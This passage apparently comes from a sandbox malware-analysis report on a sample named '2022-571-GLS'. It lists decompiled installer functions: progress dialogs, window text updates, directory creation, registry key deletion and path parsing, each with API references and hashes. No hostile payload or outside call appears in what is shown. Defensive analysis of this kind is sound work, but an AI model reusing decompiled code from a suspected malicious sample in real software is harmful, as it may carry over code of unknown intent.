                          • Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404FE7 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00404FE7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423764; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
					}
					_t26 = lstrlenA(0x41fd58);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd58;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd58)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd58, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                          0x00404fed
                          0x00404ff9
                          0x00404ffc
                          0x00405002
                          0x0040500e
                          0x00405011
                          0x00405014
                          0x0040501a
                          0x0040501a
                          0x00405020
                          0x00405028
                          0x0040502b
                          0x00405048
                          0x0040504c
                          0x00405055
                          0x00405055
                          0x0040505f
                          0x00405068
                          0x00405074
                          0x0040507b
                          0x0040507f
                          0x00405082
                          0x00405095
                          0x004050a3
                          0x004050a3
                          0x004050a7
                          0x004050a9
                          0x004050ac
                          0x00000000
                          0x004050ac
                          0x0040502d
                          0x00405035
                          0x0040503d
                          0x00405043
                          0x00000000
                          0x00405043
                          0x0040503d
                          0x0040502b
                          0x004050b6

                          APIs
                          • lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                          • lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                          • lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                          • SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                          • Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
                          • Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                          • Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402BE9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41712c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41712c = 0;
					return _t15;
				}
				__eflags =  *0x41712c; // 0x0
				if(__eflags != 0) {
					return E004060C3(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423f8c;
				if(_t6 >  *0x423f8c) {
					__eflags =  *0x423f88; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
						 *0x41712c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424034 & 0x00000001;
					if(( *0x424034 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BCD());
						return E00404FE7(0,  &_v68);
					}
				}
				return _t6;
			}







                          0x00402bf5
                          0x00402bf7
                          0x00402bfe
                          0x00402c01
                          0x00402c01
                          0x00402c07
                          0x00000000
                          0x00402c07
                          0x00402c0f
                          0x00402c15
                          0x00000000
                          0x00402c18
                          0x00402c1f
                          0x00402c25
                          0x00402c2b
                          0x00402c2d
                          0x00402c33
                          0x00402c71
                          0x00402c7a
                          0x00000000
                          0x00402c7f
                          0x00402c35
                          0x00402c3c
                          0x00402c4d
                          0x00000000
                          0x00402c5b
                          0x00402c3c
                          0x00402c87

                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402C01
                          • GetTickCount.KERNEL32 ref: 00402C1F
                          • wsprintfA.USER32 ref: 00402C4D
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                          • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
                          • ShowWindow.USER32(00000000,00000005), ref: 00402C7F
                            • Part of subcall function 00402BCD: MulDiv.KERNEL32(000105E9,00000064,?), ref: 00402BE2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 722711167-2449383134
                          • Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                          • Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
                          • Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                          • Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004048B6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                          0x004048c4
                          0x004048d1
                          0x004048d7
                          0x00404915
                          0x00404915
                          0x00404924
                          0x0040492b
                          0x00000000
                          0x0040492d
                          0x004048d9
                          0x004048e8
                          0x004048f0
                          0x004048f3
                          0x00404905
                          0x0040490b
                          0x00404912
                          0x00000000
                          0x00404912
                          0x00000000

                          APIs
                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048D1
                          • GetMessagePos.USER32 ref: 004048D9
                          • ScreenToClient.USER32 ref: 004048F3
                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404905
                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040492B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                          • Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
                          • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                          • Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402B51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BCD();
					_t19 = "unpacking data: %d%%";
					if( *0x423f90 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                          0x00402b5e
                          0x00402b6c
                          0x00402b72
                          0x00402b72
                          0x00402b80
                          0x00402b82
                          0x00402b8e
                          0x00402b93
                          0x00402b95
                          0x00402b95
                          0x00402ba0
                          0x00402bb0
                          0x00402bc2
                          0x00402bc2
                          0x00402bca

                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
                          • wsprintfA.USER32 ref: 00402BA0
                          • SetWindowTextA.USER32(?,?), ref: 00402BB0
                          • SetDlgItemTextA.USER32 ref: 00402BC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                          • Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
                          • Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                          • Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004054A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004054A9(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                          0x004054b4
                          0x004054b8
                          0x004054bb
                          0x004054c1
                          0x004054c5
                          0x004054c9
                          0x004054d1
                          0x004054d8
                          0x004054de
                          0x004054e5
                          0x004054f4
                          0x004054f6
                          0x00000000
                          0x004054f6
                          0x00405500
                          0x00405507
                          0x0040551d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040551f
                          0x00405523

                          APIs
                          • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
                          • GetLastError.KERNEL32 ref: 00405500
                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
                          • GetLastError.KERNEL32 ref: 0040551F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 3449924974-224404859
                          • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                          • Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
                          • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                          • Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406087(4);
					if(_t27 == 0) {
						if( *0x424030 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x424030, 0);
				}
				return _t18;
			}








                          0x00402a6d
                          0x00402a75
                          0x00402a9d
                          0x00402a87
                          0x00402ad7
                          0x00402add
                          0x00000000
                          0x00402adf
                          0x00402a9b
                          0x00000000
                          0x00000000
                          0x00402a9b
                          0x00402ab2
                          0x00402aba
                          0x00402ac1
                          0x00402aed
                          0x00000000
                          0x00000000
                          0x00402af5
                          0x00402afd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402afd
                          0x00000000
                          0x00402ad0
                          0x00402ae4

                          APIs
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
                          • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                          • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                          • Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
                          • Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                          • Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                          0x00401ccb
                          0x00401cd2
                          0x00401d01
                          0x00401d09
                          0x00401d10
                          0x00401d10
                          0x004028a4
                          0x004028b0

                          APIs
                          • GetDlgItem.USER32 ref: 00401CC5
                          • GetClientRect.USER32 ref: 00401CD2
                          • LoadImageA.USER32 ref: 00401CF3
                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                          • DeleteObject.GDI32(00000000), ref: 00401D10
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                          • Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
                          • Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                          • Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405882 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405882(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405634
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405819(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                          0x0040588b
                          0x0040588b
                          0x00405892
                          0x00405895
                          0x0040589a
                          0x004058ad
                          0x004058c7
                          0x00000000
                          0x004058c7
                          0x004058b1
                          0x004058b2
                          0x004058b5
                          0x004058b6
                          0x004058be
                          0x00000000
                          0x00000000
                          0x004058c0
                          0x004058c3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004058c3
                          0x00000000
                          0x004058a3
                          0x00000000
                          0x004058a4

                          APIs
                          • CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                          • CharNextA.USER32(00000000), ref: 00405895
                          • CharNextA.USER32(00000000), ref: 004058A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: 4V@$C:\
                          • API String ID: 3213498283-1503405514
                          • Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                          • Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
                          • Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                          • Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004047AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
			}



















